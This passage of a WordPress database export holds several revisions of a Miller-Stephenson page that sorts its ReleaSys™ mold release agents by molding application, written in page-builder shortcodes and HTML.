INSERT INTO `wp_posts` VALUES (4493, 2, '2017-06-07 19:41:14', '2017-06-07 19:41:14', '[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 19:41:14', '2017-06-07 19:41:14', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4494, 0, '2017-06-08 00:00:33', '2017-06-08 00:00:33', '', '', '', 'publish', 'closed', 'closed', '', '4494', '', '', '2017-06-08 00:00:33', '2017-06-08 00:00:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4494/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4495, 0, '2017-06-08 08:41:46', '2017-06-08 08:41:46', '', '', '', 'publish', 'closed', 'closed', '', '4495', '', '', '2017-06-08 08:41:46', '2017-06-08 08:41:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4495/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4496, 2, '2017-06-08 12:12:59', '2017-06-08 12:12:59', '[button text="ADVANCED COMPOSITES" target="href=#"Advanced Composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER - SILICONE - ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:12:59', '2017-06-08 12:12:59', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4497, 2, '2017-06-08 18:25:43', '2017-06-08 18:25:43', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n<p><a name="advanced composites"></a></p>\n\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\n\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\n\n[button text="POLYURETHANE" link="#polyurethane"]\n\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\n\n[button text="INJECTION PLASTICS" link="#injection"]\n\n[button text="FIBERGLASS" link="#fiber"]\n\n[button text="PRECAST / REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n<p><a name="rotational plastics"></a></p>\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n<p><a name="polyurethane"></a></p>\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n[ux_image id="4366" image_size="medium"]\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n[/col]\n<p><a name="rubber"></a></p>\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n<p><a name="injection"></a></p>\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-autosave-v1', '', '', '2017-06-08 18:25:43', '2017-06-08 18:25:43', '', 4321, 'https://www.miller-stephenson.com/4321-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4498, 2, '2017-06-08 12:15:24', '2017-06-08 12:15:24', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres 